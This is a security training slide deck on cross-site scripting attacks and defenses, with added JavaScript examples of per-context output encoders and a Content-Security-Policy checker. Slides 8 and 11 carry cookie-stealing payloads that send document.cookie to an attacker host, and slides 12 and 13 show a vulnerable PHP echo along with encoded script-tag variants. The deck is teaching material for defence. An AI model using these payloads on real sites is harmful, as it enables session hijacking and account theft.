Slide 1

XSS Attacks and Defenses
Dimitar Boyanov, dimitar.boyanov@gmail.com
Software Engineer, Security, Progress
April 27, 2021

Slide 2

Agenda
- Why
- Demo – XSS
- What is XSS
- Types of XSS
- Defenses
- Demo – CSP
- References
- Q & A

Slide 3

Why? – XSS in the news
- March 21, 2021: Multiple XSS Vulnerabilities Found In Elementor WordPress Plugin Risked Millions of Websites
- February 24, 2021: Apple Patched A Stored XSS Vulnerability In iCloud Domain
- February 12, 2021: Reflected XSS Vulnerability Existed In PayPal Currency Converter Wallet

Slide 4

DEMO – XSS Attack
- What can be achieved by loading a “special” script on a vulnerable site?

Slide 5

OWASP Top 10 (2017)
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging & Monitoring

Slide 6

Cross-Site Scripting (XSS) – Definition
- XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
- XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Slide 7

Cross-Site Scripting (XSS) – Detect, Reflected
- Reflected XSS: The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically, the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

Slide 8

Cross-Site Scripting (XSS) – Example, Reflected
- Example – Reflected XSS:
  - Core of many phishing schemes
  - The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
    (String) page += "”;
  - The attacker modifies the ‘CC’ parameter in the browser to:
    '>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie'

Slide 9

Cross-Site Scripting (XSS) – Detect, Stored
- Stored XSS: The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.

Slide 10

Cross-Site Scripting (XSS) – Detect, DOM
- DOM XSS: JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data in a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.
- Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.

Slide 11

Cross-Site Scripting (XSS) – Attacks
- Attack vectors – Reflected (Request), Persisted (DB), External (CDN)
click me!
var addr = '../evil.php?cakemonster=' + escape(document.cookie);

Slide 12

Cross-Site Scripting (XSS) – Attacks
<?php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?>
http://testsite.test/file_which_not_exist
http://testsite.test/alert("TEST");

Slide 13

Cross-Site Scripting (XSS) – Question
What is this?
- %3C%73%63%72%69%70%74%3E
- < s c r i p t >
- <script>
- +ADw-SCRIPT+AD4-

Slide 14

Cross-Site Scripting (XSS) – Defenses
- Validation
- Data Preparation
- Output encoding
- Header protections (defense-in-depth)

Slide 15

Cross-Site Scripting (XSS) – Defenses – Validation
- Blacklist
- Whitelist
- Indirect selection
- Parse
- Regular expressions

Slide 16

Cross-Site Scripting (XSS) – Defenses – Data Preparation
- Encoding
  - HTTP Response – content-type: text/html; charset=utf-8;
  - HTML encoding

Slide 17

Cross-Site Scripting (XSS) – Defenses – Output Encoding
- Specific to each injection context
  - HTML Element
  - HTML Attribute
  - URL
  - JavaScript
  - CSS
  - HTML comment
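The following is an added example, not code from the slides: output encoders for the HTML element, HTML attribute, JavaScript string and URL contexts listed above, applied to the "Not found" reflection from slide 12 (vulnerable handler beside the hardened one) and checked against the encoded forms of `<script>` from slide 13. The function names and request paths are constructed for the example; the encoders follow the usual per-context rules rather than any library's API.

```javascript
// Added example (not code from the slides): per-context output encoders,
// plus slide 12's "Not found" page rebuilt in Node.js, vulnerable vs. hardened.

// HTML element context: the five characters that can change HTML structure.
const HTML_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_MAP[c]);
}

// HTML attribute context: everything but alphanumerics becomes a numeric
// entity, so even an unquoted attribute value cannot be broken out of.
function encodeAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string context: \xHH / \uHHHH escapes, so quotes, newlines and
// </script> cannot end the string literal or the enclosing script block.
function encodeJs(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const hex = c.charCodeAt(0).toString(16);
    return hex.length <= 2 ? `\\x${hex.padStart(2, '0')}` : `\\u${hex.padStart(4, '0')}`;
  });
}

// URL parameter context: percent-encode the value only, never the whole URL.
function encodeUrlParam(s) {
  return encodeURIComponent(String(s));
}

// PHP's urldecode() never throws; mirror that so a malformed %xx is kept as-is.
function urlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// A blacklist on the raw request line (slide 15) misses the encoded forms of
// <script> from slide 13, because decoding happens after the check.
function rawBlacklistHit(requestUri) {
  return /<script>/i.test(requestUri);
}

// Slide 12 as written: decode, then echo straight into the HTML body.
function notFoundVulnerable(requestUri) {
  return 'Not found: ' + urlDecode(requestUri);
}

// Hardened: same decode, but encoded for the HTML element context it lands in.
function notFoundSafe(requestUri) {
  return 'Not found: ' + encodeHtml(urlDecode(requestUri));
}
```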

Slide 18

Cross-Site Scripting (XSS) – Defenses – Header Protections
Header protections (defense-in-depth)
- HttpOnly flag
  - Cookies cannot be accessed from JavaScript
- Content-Security-Policy
  - Declare which dynamic resources are allowed to load.
  - script-src, style-src, img-src, connect-src, font-src, etc.

Slide 19

CSP Header
Official Spec: https://www.w3.org/TR/CSP3/
Site: https://content-security-policy.com/
- CSP Header utilizes modern browsers’ built-in XSS protections
- Strong defense-in-depth protection.
- It was designed to prevent XSS.
- Reduces XSS risk on modern browsers by declaring which dynamic resources are allowed to load
- It can remove the “cross” part of “cross-site scripting”
- Still not widely used. Only ~6% of the top 1M sites used it as of 2020.

Slide 20

CSP Fetch Directives
- CSP Fetch Directives – control the locations from which certain resource types may be loaded.
  - default-src – fallback (all)
  - script-src – restricts the locations from which scripts may be executed
  - connect-src – restricts the URLs which can be loaded using script interfaces
  - child-src – governs the creation of nested browsing contexts (e.g., iframe)
  - worker-src – restricts the URLs which may be loaded as a Worker, SharedWorker, or ServiceWorker
  - font-src, frame-src, img-src, media-src, object-src, style-src

Slide 21

CSP – Other Directives
- Document Directives – control the locations from which certain resource types may be loaded.
- Navigation Directives
  - form-action – restricts the URLs which can be used as the target of form submissions from a given context.
  - frame-ancestors – restricts the URLs which can embed the resource using frame, iframe, object, or embed.
    - Protects from Clickjacking and Phishing attacks
  - navigate-to – restricts the URLs to which a document can initiate navigations by any means
- Reporting Directives
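As an added example (not code from the slides or from Sitefinity), here is a minimal evaluator for the fetch and navigation directives of the two slides above: it parses a CSP header, applies the default-src fallback that fetch directives get and navigation directives do not, and flags the script-src values that undo the protection, with a weak policy beside a corrected one. The policies and origins are constructed; port and path matching, nonces and hashes (which in CSP3 also neutralise 'unsafe-inline') are deliberately left out of this simplified matcher.

```javascript
// Added example (not code from the slides): simplified CSP evaluator for the
// fetch/navigation directives of slides 20-21. Policies below are constructed.

// Fetch directives fall back to default-src; navigation directives do not.
const FALLS_BACK_TO_DEFAULT = new Set([
  'script-src', 'style-src', 'img-src', 'connect-src', 'font-src',
  'media-src', 'object-src', 'frame-src', 'child-src', 'worker-src',
]);

// "script-src 'self' https://cdn.example.com; img-src *" -> Map(name -> sources)
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Does one source expression admit `origin`? Keywords other than 'self'
// (nonces, hashes, 'none', 'unsafe-inline') never match a host here.
function sourceMatches(source, origin, pageOrigin) {
  if (source === "'self'") return origin === pageOrigin;
  if (source === '*') return true;
  if (source.startsWith("'")) return false;
  const url = new URL(origin);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return url.protocol === source.toLowerCase();
  const host = source.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '');   // scheme-less host-source
  if (host.startsWith('*.')) return url.hostname.endsWith(host.slice(1));
  return url.host === host;
}

// Would the browser load a resource governed by `directive` from `origin`?
function isAllowed(policy, directive, origin, pageOrigin) {
  let sources = policy.get(directive);
  if (!sources && FALLS_BACK_TO_DEFAULT.has(directive)) sources = policy.get('default-src');
  if (!sources) return true; // nothing governs it: no restriction applies
  return sources.some((s) => sourceMatches(s, origin, pageOrigin));
}

// script-src values that let injected script run: inline, any host, or a bare scheme.
function weakScriptSources(policy) {
  const sources = policy.get('script-src') || policy.get('default-src') || [];
  return sources.filter((s) => s === "'unsafe-inline'" || s === '*' || /^[a-z]+:$/i.test(s));
}

const WEAK_POLICY = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";
const FIXED_POLICY = "default-src 'self'; script-src 'self' https://cdn.example.com; form-action 'self'; frame-ancestors 'none'";
```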

Slide 22

Demo – CSP
Sitefinity CSP directives

Slide 23

How to Discover XSS – Tools
- HTTP Proxies (Burp, ZAP)
- Static/Dynamic Scanners (Veracode, IBM App Scan)
- Vulnerable libraries (Dependency Check, Retire.js)
- Penetration testing

Slide 24

Demo – XSS game
- http://xss-game.appspot.com/

Slide 25

Summary
- XSS allows attackers to execute scripts
- Protections
  - Validation
  - Data Preparation
  - Output encoding
  - Header protections (defense-in-depth) – CSP

Slide 26

Q & A

Slide 27

Thank You! Now It’s Your Turn!